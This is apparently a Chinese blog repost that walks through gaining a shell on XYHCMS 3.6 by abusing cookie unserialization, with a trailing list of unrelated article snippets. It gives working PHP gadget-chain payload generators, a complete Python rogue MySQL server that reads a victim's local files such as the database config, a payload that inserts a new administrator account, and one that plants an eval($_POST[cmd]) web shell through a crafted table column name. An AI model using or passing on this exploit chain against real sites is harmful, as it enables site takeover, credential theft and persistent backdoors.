xyhcms getshell

下载xyhcms3.6.2021版本并用phpstudy搭建

function get_cookie($name, $key = '') {if (!isset($_COOKIE[$name])) {return null;}$key = empty($key) ? C('CFG_COOKIE_ENCODE') : $key;$value = $_COOKIE[$name];$key = md5($key);$sc = new \Common\Lib\SysCrypt($key);$value = $sc->php_decrypt($value);return unserialize($value);
}

这里将cookie name传过来的值进行了一个解密在反序列化,
它这里会有一个随机key存放在App\Runtime\Data\668ff60dbc75e51592f9c46b573cd3eb_config目录下的site.php其中668ff60dbc75e51592f9c46b573cd3eb_config是随机生成的目录不可拆解

a:78:{s:11:"CFG_WEBNAME";s:12:"我的网站";s:10:"CFG_WEBURL";s:21:"http://www.xyhcms.com";s:12:"CFG_WEBTITLE";s:12:"我的网站";s:12:"CFG_KEYWORDS";s:12:"我的网站";s:15:"CFG_DESCRIPTION";s:0:"";s:14:"CFG_THEMESTYLE";s:7:"default";s:17:"CFG_COOKIE_ENCODE";s:9:"UQAz3abDl";s:11:"CFG_POWERBY";s:0:"";s:9:"CFG_STATS";s:0:"";s:9:"CFG_BEIAN";s:0:"";s:11:"CFG_ADDRESS";s:15:"昆明北京路";s:9:"CFG_PHONE";s:10:"0871-66666";s:17:"CFG_WEBSITE_CLOSE";b:0;s:22:"CFG_WEBSITE_CLOSE_INFO";s:36:"站点维护中,请稍等一会...";s:15:"CFG_MOBILE_AUTO";b:1;s:14:"CFG_EMAIL_FROM";s:12:"ddend@qq.com";s:19:"CFG_EMAIL_FROM_NAME";s:6:"站名";s:14:"CFG_EMAIL_HOST";s:18:"smtp.exmail.qq.com";s:14:"CFG_EMAIL_PORT";i:25;s:19:"CFG_EMAIL_LOGINNAME";s:12:"ddend@qq.com";s:18:"CFG_EMAIL_PASSWORD";s:10:"123zstQhz4";s:11:"CFG_BADWORD";s:35:"艾滋病|中国共产党|111111111";s:18:"CFG_FEEDBACK_GUEST";b:1;s:15:"CFG_MEMBER_OPEN";b:1;s:22:"CFG_MEMBER_VERIFYEMAIL";b:0;s:19:"CFG_MEMBER_NOTALLOW";s:54:"www,bbs,ftp,mail,user,users,admin,administrator,xyhcms";s:18:"CFG_UPLOAD_MAXSIZE";i:2048;s:17:"CFG_IMGTHUMB_SIZE";a:2:{i:0;s:7:"300X300";i:1;s:5:"600X0";}s:17:"CFG_IMGTHUMB_TYPE";b:0;s:18:"CFG_CLICK_NUM_INIT";i:0;s:19:"CFG_UPLOAD_ROOTPATH";s:10:"./uploads/";s:19:"CFG_UPLOAD_FILE_EXT";s:49:"jpg,gif,png,jpeg,txt,doc,docx,xls,ppt,zip,rar,mp3";s:18:"CFG_UPLOAD_IMG_EXT";s:16:"jpg,gif,png,jpeg";s:19:"CFG_VERIFY_REGISTER";b:0;s:16:"CFG_VERIFY_LOGIN";b:0;s:20:"CFG_VERIFY_GUESTBOOK";b:1;s:17:"CFG_VERIFY_REVIEW";b:1;s:16:"CFG_SQL_FILESIZE";i:5242880;s:17:"CFG_DOWNLOAD_HIDE";b:1;s:21:"CFG_MOBILE_THEMESTYLE";s:7:"default";s:14:"HOME_URL_MODEL";i:3;s:22:"HOME_URL_PATHINFO_DEPR";s:1:"/";s:18:"HOME_URL_ROUTER_ON";b:0;s:20:"HOME_URL_ROUTE_RULES";a:6:{s:7:"Mobile$";s:18:"Mobile/Index/index";s:13:"Special/:id\d";s:13:"Special/shows";s:12:"Tag/:tname\w";s:9:"Tag/shows";s:9:":e/p/:p\d";s:10:"List/index";s:8:":e/:id\d";s:10:"Show/index";s:9:"/^(\w+)$/";s:15:"List/index?e=:1";}s:18:"HOME_HTML_CACHE_ON";b:0;s:20:"MOBILE_HTML_CACHE_ON";b:0;s:19:"HTML_CACHE_INDEX_ON";b:1;s:21:"HTML_CACHE_INDEX_TIME";i:1200;s:18:"HTML_CACHE_LIST_ON";b:1;s:20:"HTML_CACHE_LIST_TIME";i:0;s:18:"HTML_CACHE_SHOW_ON";b:1;s:20:"HTML_CACHE_SHOW_TIME";i:0;s:21:"HTML_CACHE_SPECIAL_ON";b:0;s:23:"HTML_CACHE_SPECIAL_TIME";i:0;s:15:"ONLINE_CFG_MODE";b:1;s:16:"ONLINE_CFG_STYLE";s:4:"blue";s:12:"ONLINE_CFG_H";i:1;s:19:"ONLINE_CFG_H_MARGIN";i:0;s:12:"ONLINE_CFG_V";i:2;s:19:"ONLINE_CFG_V_MARGIN";i:0;s:13:"ONLINE_CFG_QQ";a:2:{s:12:"销售咨询";s:9:"307299635";s:12:"售后服务";s:9:"307299635";}s:19:"ONLINE_CFG_WANGWANG";a:1:{s:12:"在线旺旺";s:5:"7bucn";}s:19:"ONLINE_CFG_PHONE_ON";b:1;s:16:"ONLINE_CFG_PHONE";a:2:{s:12:"销售热线";s:7:"6525411";s:12:"技术支持";s:7:"6525412";}s:23:"ONLINE_CFG_GUESTBOOK_ON";s:1:"1";s:19:"ONLINE_CFG_QQ_PARAM";s:166:"<a target="_blank" href="http://wpa.qq.com/msgrd?v=3&uin=[客服号]&site=qq&menu=yes" class="xyh-online-item"><em class="xyh-online-ico-qq"> </em>[客服说明]</a>";s:25:"ONLINE_CFG_WANGWANG_PARAM";s:209:"<a target="_blank" href="http://www.taobao.com/webww/ww.php?ver=3&touid=[客服号]&siteid=cntaobao&status=1&charset=utf-8" class="xyh-online-item"><em class="xyh-online-ico-wangwang"> </em>[客服说明]</a>";s:18:"CFG_IMAGE_WATER_ON";b:0;s:20:"CFG_IMAGE_WATER_FILE";s:27:"/Data/static/picture/sy.png";s:24:"CFG_IMAGE_WATER_POSITION";i:9;s:27:"CFG_IMAGE_WATER_DIAPHANEITY";i:100;s:28:"CFG_IMAGE_WATER_IGNORE_WIDTH";s:3:"300";s:18:"CODE_SEND_INTERVAL";i:120;s:16:"CODE_SEND_EXPIRE";i:300;s:26:"ACTIVATE_SEND_EMAIL_EXPIRE";i:172800;s:11:"SMS_SDK_ALI";a:4:{s:7:"APP_KEY";s:23:"阿里短信AccessKeyID";s:10:"APP_SECRET";s:27:"阿里短信AccessKeySecret";s:9:"SIGN_NAME";s:12:"短信签名";s:8:"SEND_URL";s:29:"https://dysmsapi.aliyuncs.com";}s:14:"SMS_SDK_TPL_ID";a:4:{s:11:"com_code1_1";s:29:"阿里短信模版通用CODE1";s:11:"reg_code1_1";s:29:"阿里短信模版注册CODE2";s:13:"login_code1_1";s:29:"阿里短信模版登录CODE3";s:14:"getpwd_code1_1";s:35:"阿里短信模版找回密码CODE4";}s:23:"HTML_CACHE_RULES_COMMON";a:3:{s:11:"index:index";a:2:{i:0;s:36:"{:module}/Index_{:action}_{p|intval}";i:1;i:1200;}s:10:"list:index";a:2:{i:0;s:51:"{:module}/List/{:action}_{e}{cid|intval}_{p|intval}";i:1;i:0;}s:10:"show:index";a:2:{i:0;s:52:"{:module}/Show/{:action}_{e}{cid|intval}_{id|intval}";i:1;i:0;}}}

可以看到key为UQAz3abDl

测试加解密

<?php
class SysCrypt {
private $crypt_key;
// 构造函数
public function __construct($crypt_key) {
$this -> crypt_key = $crypt_key;
}
public function php_encrypt($txt) {
srand((double)microtime() * 1000000);
$encrypt_key = md5(rand(0,32000));
$ctr = 0;
$tmp = '';
for($i = 0;$i<strlen($txt);$i++) {
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);
}
return base64_encode(self::__key($tmp,$this -> crypt_key));
}
public function php_decrypt($txt) {
$txt = self::__key(base64_decode($txt),$this -> crypt_key);
$tmp = '';
for($i = 0;$i < strlen($txt); $i++) {
$md5 = $txt[$i];
$tmp .= $txt[++$i] ^ $md5;
}
return $tmp;
}
private function __key($txt,$encrypt_key) {
$encrypt_key = md5($encrypt_key);
$ctr = 0;
$tmp = '';
for($i = 0; $i < strlen($txt); $i++) {
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
}
return $tmp;
}
public function __destruct() {
$this -> crypt_key = null;
}
}
/**
* 得到指定cookie的值
*
* @param string $name
*/
//function get_cookie($name, $key = '@^%$y5fbl') {
function get_cookie($name, $key = '') {
$key ='UQAz3abDl';
$value = $name;
$key = md5($key);
$sc = new SysCrypt($key);
$value = $sc->php_decrypt($value);
return unserialize($value);
}
/**
* 设置cookie
*
* @param array $args
* @return boolean
*/
//使用时修改密钥$key 涉及金额结算请重新设计cookie存储格式
//function set_cookie($args , $key = '@^%$y5fbl') {
function set_cookie($args, $key = '') {
$key ='UQAz3abDl';
$value = serialize($args);
$key = md5($key);
$sc = new SysCrypt($key);
$value = $sc->php_encrypt($value);
return $value;
//setcookie($cookieName ,$cookie, time()+3600,'/','',false);
// return setcookie($name, $value, $expire, $path, $domain, $secure); 
}
//测试加密
echo set_cookie('moonsec');
//测试解密
echo get_cookie('VCIBaVM2CmoGIQY/U2pXOQhvCXAFYAI3BnABMg==');?>

在这里插入图片描述
反序列exp读取数据库配置文件

<?php
namespace Think\Db\Driver;
use PDO;
class Mysql{
protected $options = array(
PDO::MYSQL_ATTR_LOCAL_INFILE => true
);
protected $config = array(
"dsn" => "mysql:host=192.168.0.168;dbname=xyhcms;port=3307",
"username" => "root",
"password" => "root"
);
}
namespace Think;
class Model{
protected $options = array();
protected $pk;
protected $data = array();
protected $db = null;
public function __construct(){
$this->db = new \Think\Db\Driver\Mysql();
$this->options['where'] = '';
$this->pk = 'luoke';
$this->data[$this->pk] = array(
"table" => "xyh_admin_log",
"where" => "id=0"
);
}
}
namespace Think\Session\Driver;
class Memcache{
protected $handle;
public function __construct() {
$this->handle = new \Think\Model();
}
}
namespace Think\Image\Driver;
class Imagick{
private $img;
public function __construct() {
$this->img = new \Think\Session\Driver\Memcache();
}
}
namespace Common\Lib;
class SysCrypt{
private $crypt_key;
public function __construct($crypt_key) {
$this -> crypt_key = $crypt_key;
}
public function php_encrypt($txt) {
srand((double)microtime() * 1000000);
$encrypt_key = md5(rand(0,32000));
$ctr = 0;
$tmp = '';
for($i = 0;$i<strlen($txt);$i++) {
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);
}
return base64_encode(self::__key($tmp,$this -> crypt_key));
}
public function php_decrypt($txt) {
$txt = self::__key(base64_decode($txt),$this -> crypt_key);
$tmp = '';
for($i = 0;$i < strlen($txt); $i++) {
$md5 = $txt[$i];
$tmp .= $txt[++$i] ^ $md5;
}
return $tmp;
}
private function __key($txt,$encrypt_key) {
$encrypt_key = md5($encrypt_key);
$ctr = 0;
$tmp = '';
for($i = 0; $i < strlen($txt); $i++) {
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
}
return $tmp;
}
public function __destruct() {
$this -> crypt_key = null;
}
}
function get_cookie($name, $key = '') {
$key = 'P4tzizR6d';
$key = md5($key);
$sc = new \Common\Lib\SysCrypt($key);
$value = $sc->php_decrypt($name);
return unserialize($value);
}
function set_cookie($args, $key = '') {
$key = 'P4tzizR6d';
$value = serialize($args);
$key = md5($key);
$sc = new \Common\Lib\SysCrypt($key);
$value = $sc->php_encrypt($value);
return $value;
}$b = new \Think\Image\Driver\Imagick();
$a = set_cookie($b,'');
echo str_replace('+','%2B',$a);

利用恶意mysql读取数据库配置文件

#!/usr/bin/env python
#coding: utf8import socket
import asyncore
import asynchat
import struct
import random
import logging
import logging.handlersPORT = 3306log = logging.getLogger(__name__)log.setLevel(logging.INFO)
tmp_format = logging.handlers.WatchedFileHandler('mysql.log', 'ab')
tmp_format.setFormatter(logging.Formatter("%(asctime)s:%(levelname)s:%(message)s"))
log.addHandler(tmp_format
)filelist = (#'/etc/passwd',#'/www/wwwroot/www.xycms.com/App/Common/Conf/db.php','D:/phpstudy_pro/WWW/www.xyhcms.com/App/Common/Conf/db.php',
)#================================================
#=======No need to change after this lines=======
#================================================__author__ = 'Gifts'def daemonize():import os, warningsif os.name != 'posix':warnings.warn('Cant create daemon on non-posix system')returnif os.fork(): os._exit(0)os.setsid()if os.fork(): os._exit(0)os.umask(0o022)null=os.open('/dev/null', os.O_RDWR)for i in xrange(3):try:os.dup2(null, i)except OSError as e:if e.errno != 9: raiseos.close(null)class LastPacket(Exception):passclass OutOfOrder(Exception):passclass mysql_packet(object):packet_header = struct.Struct('<Hbb')packet_header_long = struct.Struct('<Hbbb')def __init__(self, packet_type, payload):if isinstance(packet_type, mysql_packet):self.packet_num = packet_type.packet_num + 1else:self.packet_num = packet_typeself.payload = payloaddef __str__(self):payload_len = len(self.payload)if payload_len < 65536:header = mysql_packet.packet_header.pack(payload_len, 0, self.packet_num)else:header = mysql_packet.packet_header.pack(payload_len & 0xFFFF, payload_len >> 16, 0, self.packet_num)result = "{0}{1}".format(header,self.payload)return resultdef __repr__(self):return repr(str(self))@staticmethoddef parse(raw_data):packet_num = ord(raw_data[0])payload = raw_data[1:]return mysql_packet(packet_num, payload)class http_request_handler(asynchat.async_chat):def __init__(self, addr):asynchat.async_chat.__init__(self, sock=addr[0])self.addr = addr[1]self.ibuffer = []self.set_terminator(3)self.state = 'LEN'self.sub_state = 'Auth'self.logined = Falseself.push(mysql_packet(0,"".join(('\x0a',  # Protocol'5.6.28-0ubuntu0.14.04.1' + '\0','\x2d\x00\x00\x00\x40\x3f\x59\x26\x4b\x2b\x34\x60\x00\xff\xf7\x08\x02\x00\x7f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x68\x69\x59\x5f\x52\x5f\x63\x55\x60\x64\x53\x52\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00',))            ))self.order = 1self.states = ['LOGIN', 'CAPS', 'ANY']def push(self, data):log.debug('Pushed: %r', data)data = str(data)asynchat.async_chat.push(self, data)def collect_incoming_data(self, data):log.debug('Data recved: %r', data)self.ibuffer.append(data)def found_terminator(self):data = "".join(self.ibuffer)self.ibuffer = []if self.state == 'LEN':len_bytes = ord(data[0]) + 256*ord(data[1]) + 65536*ord(data[2]) + 1if len_bytes < 65536:self.set_terminator(len_bytes)self.state = 'Data'else:self.state = 'MoreLength'elif self.state == 'MoreLength':if data[0] != '\0':self.push(None)self.close_when_done()else:self.state = 'Data'elif self.state == 'Data':packet = mysql_packet.parse(data)try:if self.order != packet.packet_num:raise OutOfOrder()else:# Fix ?self.order = packet.packet_num + 2if packet.packet_num == 0:if packet.payload[0] == '\x03':log.info('Query')filename = random.choice(filelist)PACKET = mysql_packet(packet,'\xFB{0}'.format(filename))self.set_terminator(3)self.state = 'LEN'self.sub_state = 'File'self.push(PACKET)elif packet.payload[0] == '\x1b':log.info('SelectDB')self.push(mysql_packet(packet,'\xfe\x00\x00\x02\x00'))raise LastPacket()elif packet.payload[0] in '\x02':self.push(mysql_packet(packet, '\0\0\0\x02\0\0\0'))raise LastPacket()elif packet.payload == '\x00\x01':self.push(None)self.close_when_done()else:raise ValueError()else:if self.sub_state == 'File':log.info('-- result')log.info('Result: %r', data)if len(data) == 1:self.push(mysql_packet(packet, '\0\0\0\x02\0\0\0'))raise LastPacket()else:self.set_terminator(3)self.state = 'LEN'self.order = packet.packet_num + 1elif self.sub_state == 'Auth':self.push(mysql_packet(packet, '\0\0\0\x02\0\0\0'))raise LastPacket()else:log.info('-- else')raise ValueError('Unknown packet')except LastPacket:log.info('Last packet')self.state = 'LEN'self.sub_state = Noneself.order = 0self.set_terminator(3)except OutOfOrder:log.warning('Out of order')self.push(None)self.close_when_done()else:log.error('Unknown state')self.push('None')self.close_when_done()class mysql_listener(asyncore.dispatcher):def __init__(self, sock=None):asyncore.dispatcher.__init__(self, sock)if not sock:self.create_socket(socket.AF_INET, socket.SOCK_STREAM)self.set_reuse_addr()try:self.bind(('', PORT))except socket.error:exit()self.listen(5)def handle_accept(self):pair = self.accept()if pair is not None:log.info('Conn from: %r', pair[1])tmp = http_request_handler(pair)z = mysql_listener()
# daemonize()
asyncore.loop()

python直接运行连接端口为3306

在登录之后将密文填到nickname里面就能反序列化了
添加管理员用户

namespace Think\Db\Driver;
use PDO;
class Mysql{
protected $options = array(
PDO::MYSQL_ATTR_LOCAL_INFILE => true
);
protected $config = array(
"dsn" => "mysql:host=127.0.0.1;dbname=xyhcms;port=3306",
"username" => "root",
"password" => "123456"
);
}
namespace Think;
class Model{
protected $options = array();
protected $pk;
protected $data = array();
protected $db = null;
public function __construct(){
$this->db = new \Think\Db\Driver\Mysql();
$this->options['where'] = '';
$this->pk = 'luoke';
$this->data[$this->pk] = array(
"table" => "xyh_admin_log",
"where" => "id=0;insert into www_xycms_com.xyh_admin
(id,username,password,encrypt,user_type,is_lock,login_num) VALUES
(null,'test','88bf2f72156e8e2accc2215f7a982a83','sggFkZ',9,0,4);"
);
/**test/123456**/
}
}
namespace Think\Session\Driver;
class Memcache{
protected $handle;
public function __construct() {
$this->handle = new \Think\Model();
}
}
namespace Think\Image\Driver;
class Imagick{
private $img;
public function __construct() {
$this->img = new \Think\Session\Driver\Memcache();
}
}
namespace Common\Lib;
class SysCrypt{
private $crypt_key;
public function __construct($crypt_key) {
$this -> crypt_key = $crypt_key;
}
public function php_encrypt($txt) {
srand((double)microtime() * 1000000);
$encrypt_key = md5(rand(0,32000));
$ctr = 0;
$tmp = '';
for($i = 0;$i<strlen($txt);$i++) {
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);
}
return base64_encode(self::__key($tmp,$this -> crypt_key));
}
public function php_decrypt($txt) {
$txt = self::__key(base64_decode($txt),$this -> crypt_key);
$tmp = '';
for($i = 0;$i < strlen($txt); $i++) {
$md5 = $txt[$i];
$tmp .= $txt[++$i] ^ $md5;
}
return $tmp;
}
private function __key($txt,$encrypt_key) {
$encrypt_key = md5($encrypt_key);
$ctr = 0;
$tmp = '';
for($i = 0; $i < strlen($txt); $i++) {
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
}
return $tmp;
}
public function __destruct() {
$this -> crypt_key = null;
}
}
function get_cookie($name, $key = '') {
$key = 'UQAz3abDl';
$key = md5($key);
$sc = new \Common\Lib\SysCrypt($key);
$value = $sc->php_decrypt($name);
return unserialize($value);
}
function set_cookie($args, $key = '') {
$key = 'UQAz3abDl';
$value = serialize($args);
$key = md5($key);
$sc = new \Common\Lib\SysCrypt($key);
$value = $sc->php_encrypt($value);
return $value;
}$b = new \Think\Image\Driver\Imagick();
$a = set_cookie($b,'');
echo str_replace('+','%2B',$a);

在这里插入图片描述
成功添加用户
后台getshell

<?phpnamespace Think\Db\Driver;
use PDO;
class Mysql{
protected $options = array(
PDO::MYSQL_ATTR_LOCAL_INFILE => true
);
protected $config = array(
"dsn" => "mysql:host=127.0.0.1;dbname=xyhcms;port=3306",
"username" => "root",
"password" => "123456"
);
}
namespace Think;
class Model{
protected $options = array();
protected $pk;
protected $data = array();
protected $db = null;
public function __construct(){
$this->db = new \Think\Db\Driver\Mysql();
$this->options['where'] = '';
$this->pk = 'luoke';
$this->data[$this->pk] = array(
"table" => "xyh_admin_log",
"where" => "id=0; alter table xyh_guestbook add column `<script
language='php'>eval(\$_POST[cmd]);</script>` varchar(10);",
);
}
}
namespace Think\Session\Driver;
class Memcache{
protected $handle;
public function __construct() {
$this->handle = new \Think\Model();
}
}
namespace Think\Image\Driver;
class Imagick{
private $img;
public function __construct() {
$this->img = new \Think\Session\Driver\Memcache();
}
}
namespace Common\Lib;
class SysCrypt{
private $crypt_key;
public function __construct($crypt_key) {
$this -> crypt_key = $crypt_key;
}
public function php_encrypt($txt) {
srand((double)microtime() * 1000000);
$encrypt_key = md5(rand(0,32000));
$ctr = 0;
$tmp = '';
for($i = 0;$i<strlen($txt);$i++) {
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);
}
return base64_encode(self::__key($tmp,$this -> crypt_key));
}
public function php_decrypt($txt) {
$txt = self::__key(base64_decode($txt),$this -> crypt_key);
$tmp = '';
for($i = 0;$i < strlen($txt); $i++) {
$md5 = $txt[$i];
$tmp .= $txt[++$i] ^ $md5;
}
return $tmp;
}
private function __key($txt,$encrypt_key) {
$encrypt_key = md5($encrypt_key);
$ctr = 0;
$tmp = '';
for($i = 0; $i < strlen($txt); $i++) {
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
}
return $tmp;
}
public function __destruct() {
$this -> crypt_key = null;
}
}
function get_cookie($name, $key = '') {
$key = 'UQAz3abDl';
$key = md5($key);
$sc = new \Common\Lib\SysCrypt($key);
$value = $sc->php_decrypt($name);
return unserialize($value);
}
function set_cookie($args, $key = '') {
$key = 'UQAz3abDl';
$value = serialize($args);
$key = md5($key);
$sc = new \Common\Lib\SysCrypt($key);
$value = $sc->php_encrypt($value);
return $value;
}
$b = new \Think\Image\Driver\Imagick();
$a = set_cookie($b,'');
echo str_replace('+','%2B',$a);?>

在后台清理缓存 访问 http://192.168.0.160//index.php?s=/Guestbook/index.html生成缓存再访问
终于进来了。
在后台清理缓存 访问 http://192.168.0.160//index.php?s=/Guestbook/index.html生成缓存再访问

http://192.168.0.160/App/Runtime/Data/3277c100b8afcccfb950d28a6ff7113c__fields/w
ww_xycms_com.xyh_guestbook.php

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/89529.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

中国沿海水产养殖空间分布数据集(1990-2022)

4年间隔的遥感信息提取中国沿海水产养殖空间分布数据集&#xff08;1990-2022&#xff09; 人口增长引起水产品需求快速增加&#xff0c;而野生捕捞产量受环境承载力的限制趋于饱和&#xff0c;这使得水产养殖业在过去数十年间迅速发展。水产养殖能够有效保障人类粮食安全和营养…

Web自动化测试 —— headless无头浏览器!

一、Options概述 是一个配置浏览器启动的选项类&#xff0c;用于自定义和配置Driver会话常见使用场景&#xff1a; 设置无头模式:不会显示调用浏览器&#xff0c;避免人为干扰的问题。设置调试模式:调试自动化测试代码&#xff08;浏览器复用&#xff09; 二、添加启动配置 添…

谈谈前端和后端的选择

引言 在我的印象中&#xff0c;也是视线里&#xff0c;后端都是在一个黑屏的页面&#xff0c;左边一个文件类&#xff0c;右边在不停的写sql,一只手放在键盘上&#xff0c;一边写&#xff0c;一遍不停的关联进入&#xff0c;感觉很无趣&#xff0c;他们的分享不是什么java集成&…

Java分支结构:一次不经意的选择,改变了我的一生。

&#x1f451;专栏内容&#xff1a;Java⛪个人主页&#xff1a;子夜的星的主页&#x1f495;座右铭&#xff1a;前路未远&#xff0c;步履不停 目录 一、顺序结构二、分支结构1、if语句2、switch语句 好久不见&#xff01;命运之轮常常在不经意间转动&#xff0c;有时一个看似微…

静态通讯录

今天我们分享一下静态通讯录详细解释和代码&#xff0c;之前分享过的只是通讯录的代码&#xff0c;但是我们没有进行讲解和解释&#xff0c;今天我们一边分享它的代码一边解释原因&#xff0c;让大家可以手撕通讯录。现在开始我们的学习吧。 首先我们应该要有三个文件&#xf…

MYSQL8解压版 windows 主从部署步骤及配置(包含配置文件,教程文件,免积分下载)

MYSQL8解压版 windows 主从部署步骤及配置 一.安装MSYQL 这里只讲大概,详细步骤、my.ini文件、安装包等会在页尾文件中(正常情况按首个mysql安装,只是名字有区别) 1.主库my.ini配置 [mysqld] #典型的值是5-6GB(8GB内存)&#xff0c;8-11GB(16GB内存), 20-25GB(32GB内存)&…

Ctfshow web入门 XSS篇 web316-web333 详细题解 全

CTFshow XSS web316 是反射型 XSS 法一&#xff1a; 利用现成平台 法二&#xff1a; 自己搭服务器 先在服务器上面放一个接受Cookie的文件。 文件内容&#xff1a; <?php$cookie $_GET[cookie];$time date(Y-m-d h:i:s, time());$log fopen("cookie.txt"…

java实现字典回写

目录 前言 实现 新增注解 新增切面 前言 字典管理是大部分系统都有的一个模块&#xff0c;用来管理业务上的字典数据&#xff0c;通常是树状结构&#xff0c;用键值对进行存储。然后具体业务场景使用字典数据时&#xff0c;业务数据往往存的是字典编码&#xff0c;因此查看…

路由器配置静态和默认路由实现VLAN之间的通信

目录 华为路由器静态路由和默认路由的写法 静态路由和默认路由的区别 案例 华为路由器静态路由和默认路由的写法 配置静态路由&#xff1a; [Huawei] ip route-static <目标网络> <子网掩码> <下一跳地址> 实例&#xff1a;将目标网络192.168.10.0/24的流…

一站式吃鸡利器,提升游戏战斗力,助您稳坐鸡王宝座!

各位吃鸡玩家们&#xff0c;听说过绝地求生作图工具吗&#xff1f;想知道如何提高游戏战斗力、分享顶级作战干货、查询装备皮肤库存&#xff1f;还在为游戏账号安全而担心吗&#xff1f;别急&#xff0c;今天就为您介绍一款一站式吃鸡利器&#xff0c;满足您的所有需求&#xf…

如何快速搭建一个react项目?如何使用react脚手架快速搭建项目?

如何使用react脚手架快速搭建项目&#xff1f; 一、前提 电脑已经安装了node和npm环境。 react文档中要求Node > 8.10 和 npm > 5.6&#xff0c;查看版本&#xff1a;node -v&#xff1b;npm -v&#xff1b; 二、步骤 1、在合适的文件夹中打开命令行窗口cmd 2、全局安…

SkyWalking搭配springboot应用(三)

title: “SkyWalking搭配springboot应用(三)” createTime: 2021-07-13T16:27:5708:00 updateTime: 2021-07-13T16:27:5708:00 slug: “SkyWalking搭配springboot应用(三)” draft: false author: “ggball” tags: [“skywalking”] categories: [“java”] description: “sk…

[论文笔记]Prefix Tuning

引言 今天带来微调LLM的第二篇论文笔记Prefix-Tuning。 作者提出了用于自然语言生成任务的prefix-tuning(前缀微调)的方法,固定语言模型的参数而优化一些连续的任务相关的向量,称为prefix。受到了语言模型提示词的启发,允许后续的token序列注意到这些prefix,当成虚拟toke…

美篇作文网教学资源源码-自带作文数据

非常漂亮的UI设计和页面排版&#xff01; 自适应手机pc端 页面内容均支持自定义 可以用来做网站矩阵&#xff0c;或者增强你其他网站板块&#xff0c;或者单独运营都可以。 可以通过广告方式变现&#xff0c;或者引流等等 友好的seo&#xff0c;更容易被浏览器收录 关注青狐…

网络爬虫学习笔记 1 HTTP基本原理

HTTP原理 ~~~~~ HTTP&#xff08;Hyper Text Transfer Protocol&#xff0c;超文本传输协议&#xff09;是一种使用最为广泛的网络请求方式&#xff0c;常见于在浏览器输入一个地址。 1. URI和URL URL&#xff08;Universal Resource Locator&#xff0c;统一资源定位器&…

Android导航抽屉

本文所有代码均位于https://github.com/MADMAX110/CatChat 之前使用过标签页布局可以让用户在应用中轻松地导航。 当只有为数不多地几个类别屏幕&#xff0c;而且它们都在应用层次结构地同一级上&#xff0c;标签页布局就很适用。 而抽屉导航可以实现更多选择&#xff0c;这是一…

MySQL基础-多表查询

目录 简单概述 1.多表之间的关系 1.1 一对多/多对一 1.2 多对多 1.3 一对一 2. 多表查询-内连接 2.1 隐式内连接 2.2 显式内连接 2.3 内连接小结 3.多表查询-外连接 3.1 左外连接 3.2 右外连接 4.多表查询-自连接 4.1 应用 5.多表查询-联合查询 6.子查询 6.1 标量子…

leetcode 10. 正则表达式匹配

2023.9.20 感觉是目前做过dp题里最难的一题了... 本题首要的就是需要理解题意&#xff0c;翻了评论区我才发现之前一直理解的题意是错的。 我原来理解的 “ *匹配0次” 是指&#xff1a;*直接消失&#xff0c;不会影响到前面的字符。 但是*和前一个字符其实是连体的&#xff0…

现代 GPU 容易受到新 GPU.zip 侧通道攻击

来自四所美国大学的研究人员开发了一种新的 GPU 侧通道攻击&#xff0c;该攻击利用数据压缩在访问网页时泄露现代显卡中的敏感视觉数据。 研究人员通过 Chrome 浏览器执行跨源 SVG 过滤器像素窃取攻击&#xff0c;证明了这种“ GPU.zip ”攻击的有效性。 研究人员于 2023 年 …

mysql面试题2:说一说MySQL的架构设计?一条 MySQL 语句执行的步骤?

该文章专注于面试,面试只要回答关键点即可,不需要对框架有非常深入的回答,如果你想应付面试,是足够了,抓住关键点 面试官:说一说MySQL的架构设计? MySQL的架构设计主要包括以下几个组件: 连接器(Connector):负责与客户端建立连接,并进行身份验证和授权。 查询缓存…